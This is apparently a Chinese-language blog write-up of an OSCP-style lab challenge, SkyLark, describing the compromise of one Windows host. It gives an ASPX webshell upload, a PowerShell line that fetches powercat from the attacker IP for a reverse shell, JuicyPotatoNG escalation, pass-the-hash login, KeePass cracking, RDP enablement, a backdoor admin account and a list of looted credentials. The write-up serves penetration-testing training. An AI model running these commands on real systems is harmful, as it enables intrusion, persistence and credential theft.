Challenge 3 - SkyLark(5)

 Challenge 3 - SkyLark(5)


下一台選定攻擊的機器回到外網的 .226



Rustscan 



snmp check



nmap



使用枚舉到的 ftp_jp:~be<3@6fe1Z:2e8 測試登入 24621 Port 成功登入




開始枚舉檔案,比較有用的檔案 security.txt
當中有提到寄信到 Contact: mailto:security@skylark.jp



發現可以上傳,丟一個 cmdasp.aspx 上去



也上傳了相同檔案在許多路徑,但始終無法順利存取 cmdasp.aspx

將網頁轉成英文看一下,發現有支援多語系版本但找不到切換語言的地方




測試到最後發現將 skylark.jp 指向到 .226 伺服器開起來是 IIS 首頁


直接存取 http://skylark.jp:24680/cmdasp.aspx 終於成功了



whoami 先測試一下確認命令可以執行




直接跑 powershell 來抓 powercat.ps1 建立 reverse shell

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.206/tools/powercat.ps1'); powercat -c 192.168.45.206 -p 4444 -e powershell"

進來了




找不到 local.txt ,直接開始 PE 發現 SeImpersonatePrivilege Enable

標準作業 JuicyPotatoNG.exe 下去



拿到管理員權限了



這時候兩個 flag 都可以讀到了,難道是一開始進來的路徑有其他解法

所以用 IIS 的權限進來是誤打誤撞 ? 搞不好要用 j_local 的帳號進來才對......先不管它繼續往下走



這一台上面發現爛梗 *.kdbx 檔案



先收集相關帳號密碼,administrator NTLM Hash 90ebcd7b7e2b6be22a05ceb0bf486944



拿到 HASH 後走 evil-winrm 進去抓檔案方便多了

└─$ evil-winrm -i 192.168.224.226 -u administrator -H 90ebcd7b7e2b6be22a05ceb0bf486944



用 keepass2john 轉換 HASH 然後修改 HASH 破解 HASH



要跑 39 天,天啊~~~~~等個 10~15 分鐘沒出來就先放棄






換個小一點的字典檔 fasttrack.txt 試試看,└─$ hashcat -m 13400 keepass.hash /usr/share/wordlists/fasttrack.txt -r /usr/share/hashcat/rules/best64.rule --force

不到五秒就破解出來了,密碼是 P@ssword!




接著開啟 RDP & Firewall 進行進一步的枚舉看看

開啟 RDP

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

再開 Firewall,netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

測試一下 .226 的 RDP 看來是開啟了



加一個 aries:Oscp#1234 到本機管理員群組

net user aries Oscp#1234 /add

net localgroup administrators aries /add



RDP 進去看看,是個日文作業系統

└─$ xfreerdp /v:192.168.224.226 /u:aries /p:'Oscp#1234' -drive:aries,/home/kali/lab3/226 



先改英文顯示再來枚舉



直接先開啟 Password.kdbx 看看



獲取得到好幾組帳號密碼

Michael321:12345

j.local:5iQ78OU2JHAAKbQc5XAr

Hitoshi:xsYu9XPYNu9dBfHo8L4k

Email : Hitoshi@skylark.com:ganbatteyo!123

ann.sales:B9aL9lbDOlNkGmJxusmi

Network(Squid Proxy) : ext_acc:DoNotShare!SkyLarkLegacyInternal2008

更新帳號密碼表



這一台看來 1434 Port 上還有 MS-SQL Server



測試了幾組帳號密碼沒有結果



RDP 測試 j.local:5iQ78OU2JHAAKbQc5XAr 沒有結果,但有發現帳號是 j_local

改測試 j_local:5iQ78OU2JHAAKbQc5XAr 看來帳號密碼是對的



更新攻擊列表




留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(0)